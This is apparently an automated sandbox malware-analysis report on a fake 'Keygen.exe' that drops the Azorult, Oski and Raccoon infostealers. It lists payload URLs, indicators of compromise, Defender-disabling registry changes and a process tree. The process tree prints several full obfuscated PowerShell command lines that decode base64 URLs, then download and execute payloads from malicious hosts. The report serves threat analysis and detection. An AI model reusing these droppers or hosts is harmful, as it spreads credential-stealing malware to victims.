Resubmissions
14-03-2021 10:17
210314-fsh5gvfbqx 1031-10-2020 16:07
201031-jhx64f88en 1001-10-2020 20:46
201001-nyhbt4p25j 1001-10-2020 20:45
201001-c3xkyk1ytn 1001-10-2020 20:43
201001-j5wlprfb6a 1023-09-2020 09:23
200923-31plnbj8kx 1007-09-2020 15:39
200907-ttv28yxx3e 1007-09-2020 15:39
200907-n38qzysfy6 1007-09-2020 15:38
200907-9llegynkjx 1007-09-2020 15:31
200907-3xqj79j9gx 10Analysis
-
max time kernel
68s -
max time network
146s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
07-09-2020 15:39
Static task
static1
Behavioral task
behavioral1
Sample
Keygen.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
Keygen.exe
Resource
win10v200722
General
-
Target
Keygen.exe
-
Size
849KB
-
MD5
dbde61502c5c0e17ebc6919f361c32b9
-
SHA1
189749cf0b66a9f560b68861f98c22cdbcafc566
-
SHA256
88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b
-
SHA512
d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb
Malware Config
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
C:\Users\Admin\AppData\LocalLow\machineinfo.txt
raccoon
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/1320-265-0x0000000002D30000-0x0000000002D35000-memory.dmp disable_win_def -
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon log file 1 IoCs
Detects a log file produced by the Raccoon Stealer.
Processes:
yara_rule raccoon_log_file -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 13 3204 powershell.exe 14 1432 powershell.exe 15 4064 powershell.exe 18 3204 powershell.exe 20 4064 powershell.exe 21 1432 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
Processes:
Keygen.exekzv.exexsn.exeCVhffgrdDFbv.exeCVhffgrdDFbv.exezVhgfgjbnv.exezVhgfgjbnv.exebot.exeCVhffgrdDFbv.exexsn.exekzv.exezVhgfgjbnv.exezVhgfgjbnv.exeCVhffgrdDFbv.exeRfuDZIiMnF.exeruY2MTTTCi.exeX8MTcYe6Ra.exe03L24JM1FJ.exeX8MTcYe6Ra.exe03L24JM1FJ.exepid process 3856 Keygen.exe 4772 kzv.exe 4764 xsn.exe 4956 CVhffgrdDFbv.exe 4980 CVhffgrdDFbv.exe 4996 zVhgfgjbnv.exe 5016 zVhgfgjbnv.exe 5072 bot.exe 4220 CVhffgrdDFbv.exe 4224 xsn.exe 4248 kzv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4404 CVhffgrdDFbv.exe 5024 RfuDZIiMnF.exe 1392 ruY2MTTTCi.exe 4200 X8MTcYe6Ra.exe 3116 03L24JM1FJ.exe 1320 X8MTcYe6Ra.exe 4960 03L24JM1FJ.exe -
Loads dropped DLL 12 IoCs
Processes:
zVhgfgjbnv.exezVhgfgjbnv.exexsn.exepid process 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
03L24JM1FJ.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 03L24JM1FJ.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 03L24JM1FJ.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
Processes:
xsn.exedescription ioc process File created C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\desktop.ini xsn.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
Processes:
CVhffgrdDFbv.exexsn.exekzv.exeCVhffgrdDFbv.exezVhgfgjbnv.exezVhgfgjbnv.exepid process 4220 CVhffgrdDFbv.exe 4224 xsn.exe 4248 kzv.exe 4220 CVhffgrdDFbv.exe 4224 xsn.exe 4248 kzv.exe 4404 CVhffgrdDFbv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
xsn.exeCVhffgrdDFbv.exekzv.exezVhgfgjbnv.exezVhgfgjbnv.exeCVhffgrdDFbv.exeX8MTcYe6Ra.exe03L24JM1FJ.exedescription pid process target process PID 4764 set thread context of 4224 4764 xsn.exe xsn.exe PID 4956 set thread context of 4220 4956 CVhffgrdDFbv.exe CVhffgrdDFbv.exe PID 4772 set thread context of 4248 4772 kzv.exe kzv.exe PID 5016 set thread context of 4408 5016 zVhgfgjbnv.exe zVhgfgjbnv.exe PID 4996 set thread context of 4396 4996 zVhgfgjbnv.exe zVhgfgjbnv.exe PID 4980 set thread context of 4404 4980 CVhffgrdDFbv.exe CVhffgrdDFbv.exe PID 4200 set thread context of 1320 4200 X8MTcYe6Ra.exe X8MTcYe6Ra.exe PID 3116 set thread context of 4960 3116 03L24JM1FJ.exe 03L24JM1FJ.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
zVhgfgjbnv.exezVhgfgjbnv.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString zVhgfgjbnv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString zVhgfgjbnv.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 3080 timeout.exe 968 timeout.exe 1240 timeout.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4644 taskkill.exe 4660 taskkill.exe -
Modifies data under HKEY_USERS 6 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 477987603d85d601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexsn.exezVhgfgjbnv.exezVhgfgjbnv.exepid process 3204 powershell.exe 3944 powershell.exe 3952 powershell.exe 4064 powershell.exe 1432 powershell.exe 2116 powershell.exe 1432 powershell.exe 3944 powershell.exe 3952 powershell.exe 4064 powershell.exe 2116 powershell.exe 3204 powershell.exe 3204 powershell.exe 3944 powershell.exe 3952 powershell.exe 2116 powershell.exe 1432 powershell.exe 4064 powershell.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4224 xsn.exe 4396 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4408 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe 4396 zVhgfgjbnv.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
xsn.exeCVhffgrdDFbv.exekzv.exezVhgfgjbnv.exezVhgfgjbnv.exeCVhffgrdDFbv.exepid process 4764 xsn.exe 4956 CVhffgrdDFbv.exe 4772 kzv.exe 5016 zVhgfgjbnv.exe 4996 zVhgfgjbnv.exe 4980 CVhffgrdDFbv.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
svchost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exeRfuDZIiMnF.exebot.exeX8MTcYe6Ra.exeX8MTcYe6Ra.exe03L24JM1FJ.exePowershell.exedescription pid process Token: SeShutdownPrivilege 1060 svchost.exe Token: SeCreatePagefilePrivilege 1060 svchost.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 3952 powershell.exe Token: SeDebugPrivilege 3204 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 4660 taskkill.exe Token: SeDebugPrivilege 4644 taskkill.exe Token: SeDebugPrivilege 5024 RfuDZIiMnF.exe Token: SeDebugPrivilege 5072 bot.exe Token: SeDebugPrivilege 4200 X8MTcYe6Ra.exe Token: SeDebugPrivilege 1320 X8MTcYe6Ra.exe Token: SeDebugPrivilege 3116 03L24JM1FJ.exe Token: SeDebugPrivilege 4192 Powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Keygen.exepid process 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe 3856 Keygen.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
Keygen.exekzv.exexsn.exeCVhffgrdDFbv.exezVhgfgjbnv.exeCVhffgrdDFbv.exezVhgfgjbnv.exepid process 3856 Keygen.exe 4772 kzv.exe 4764 xsn.exe 4956 CVhffgrdDFbv.exe 5016 zVhgfgjbnv.exe 4980 CVhffgrdDFbv.exe 4996 zVhgfgjbnv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Keygen.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exekzv.exexsn.exedescription pid process target process PID 3056 wrote to memory of 3668 3056 Keygen.exe cmd.exe PID 3056 wrote to memory of 3668 3056 Keygen.exe cmd.exe PID 3056 wrote to memory of 3668 3056 Keygen.exe cmd.exe PID 3668 wrote to memory of 3856 3668 cmd.exe Keygen.exe PID 3668 wrote to memory of 3856 3668 cmd.exe Keygen.exe PID 3668 wrote to memory of 3856 3668 cmd.exe Keygen.exe PID 3668 wrote to memory of 3384 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3384 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3384 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 496 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 496 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 496 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3080 3668 cmd.exe timeout.exe PID 3668 wrote to memory of 3080 3668 cmd.exe timeout.exe PID 3668 wrote to memory of 3080 3668 cmd.exe timeout.exe PID 3668 wrote to memory of 3104 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3104 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3104 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3864 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3864 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3864 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 968 3668 cmd.exe timeout.exe PID 3668 wrote to memory of 968 3668 cmd.exe timeout.exe PID 3668 wrote to memory of 968 3668 cmd.exe timeout.exe PID 3864 wrote to memory of 3952 3864 mshta.exe powershell.exe PID 3864 wrote to memory of 3952 3864 mshta.exe powershell.exe PID 3864 wrote to memory of 3952 3864 mshta.exe powershell.exe PID 496 wrote to memory of 3944 496 mshta.exe powershell.exe PID 496 wrote to memory of 3944 496 mshta.exe powershell.exe PID 496 wrote to memory of 3944 496 mshta.exe powershell.exe PID 3384 wrote to memory of 4064 3384 mshta.exe powershell.exe PID 3384 wrote to memory of 4064 3384 mshta.exe powershell.exe PID 3384 wrote to memory of 4064 3384 mshta.exe powershell.exe PID 3104 wrote to memory of 1432 3104 mshta.exe powershell.exe PID 3104 wrote to memory of 1432 3104 mshta.exe powershell.exe PID 3104 wrote to memory of 1432 3104 mshta.exe powershell.exe PID 3668 wrote to memory of 3784 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3784 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 3784 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 688 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 688 3668 cmd.exe mshta.exe PID 3668 wrote to memory of 688 3668 cmd.exe mshta.exe PID 688 wrote to memory of 2116 688 mshta.exe powershell.exe PID 688 wrote to memory of 2116 688 mshta.exe powershell.exe PID 688 wrote to memory of 2116 688 mshta.exe powershell.exe PID 3784 wrote to memory of 3204 3784 mshta.exe powershell.exe PID 3784 wrote to memory of 3204 3784 mshta.exe powershell.exe PID 3784 wrote to memory of 3204 3784 mshta.exe powershell.exe PID 3204 wrote to memory of 4764 3204 powershell.exe xsn.exe PID 3204 wrote to memory of 4764 3204 powershell.exe xsn.exe PID 3204 wrote to memory of 4764 3204 powershell.exe xsn.exe PID 4064 wrote to memory of 4772 4064 powershell.exe kzv.exe PID 4064 wrote to memory of 4772 4064 powershell.exe kzv.exe PID 4064 wrote to memory of 4772 4064 powershell.exe kzv.exe PID 4772 wrote to memory of 4956 4772 kzv.exe CVhffgrdDFbv.exe PID 4772 wrote to memory of 4956 4772 kzv.exe CVhffgrdDFbv.exe PID 4772 wrote to memory of 4956 4772 kzv.exe CVhffgrdDFbv.exe PID 4764 wrote to memory of 4980 4764 xsn.exe CVhffgrdDFbv.exe PID 4764 wrote to memory of 4980 4764 xsn.exe CVhffgrdDFbv.exe PID 4764 wrote to memory of 4980 4764 xsn.exe CVhffgrdDFbv.exe PID 4772 wrote to memory of 4996 4772 kzv.exe zVhgfgjbnv.exe PID 4772 wrote to memory of 4996 4772 kzv.exe zVhgfgjbnv.exe PID 4772 wrote to memory of 4996 4772 kzv.exe zVhgfgjbnv.exe PID 4764 wrote to memory of 5016 4764 xsn.exe zVhgfgjbnv.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\766E.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\766E.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3856 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Users\Public\kzv.exe"C:\Users\Public\kzv.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4220 -
C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4996 -
C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4396 & erase C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe & RD /S /Q C:\\ProgramData\\703026737453063\\* & exit8⤵PID:4840
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 43969⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4644 -
C:\Users\Public\kzv.exe"C:\Users\Public\kzv.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4248 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:3080 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Users\Public\bot.exe"C:\Users\Public\bot.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5072 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\766E.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = 